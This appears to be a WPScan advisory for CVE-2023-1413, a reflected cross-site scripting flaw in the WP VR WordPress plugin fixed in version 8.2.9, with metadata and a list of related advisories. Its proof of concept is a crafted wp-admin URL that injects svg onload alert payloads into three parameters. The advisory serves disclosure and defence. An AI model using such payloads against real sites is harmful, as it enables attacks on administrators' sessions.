WP VR < 8.2.9 – Reflected XSS | CVE 2023-1413 | Plugin Vulnerabilities

Description

The plugin does not sanitise and escape some parameters before outputting them back in the page, leading to a Reflected Cross-Site Scripting which could be used against high privilege users such as admin

Proof of Concept

Make a logged in admin open the below URL:

https://example.com/wp-admin/post-new.php?post_type=wpvr_item&active_tab="><svg/onload=alert(/XSS-active_tab/)>&scene="><svg/onload=alert(/XSS-scene/)>&hotspot="><svg/onload=alert(/XSS-hotspot/)>

Affects Plugins

Fixed in 8.2.9

References

CVE

Classification

Type

XSS

OWASP top 10

A7: Cross-Site Scripting (XSS)

CWE

CVSS

Miscellaneous

Original Researcher

Erwan LR (WPScan)

Verified

Yes

WPVDB ID

6938fee5-3510-45e6-8112-c9e2b30f6881

Timeline

Publicly Published

2023-03-22 (about 1 years ago)

Added

2023-03-22 (about 1 years ago)

Last Updated

2023-03-22 (about 1 years ago)

Other

Published

Title

Published

2015-04-20

Title

P3 (Plugin Performance Profiler) <= 1.5.3.8 - Cross-Site Scripting (XSS)

Published

2023-01-10

Title

Easy Testimonials < 3.9.3 - Contributor+ Stored XSS

Published

2021-06-15

Title

WP Google Maps < 8.1.13 - Multiple Admin+ Stored Cross-Site Scripting

Published

2022-08-17

Title

Autoptimize < 3.1.1 - Admin+ Stored Cross Site Scripting

Published

2022-01-10

Title

Cluevo < 1.8.1 - Admin+ Stored Cross Site Scripting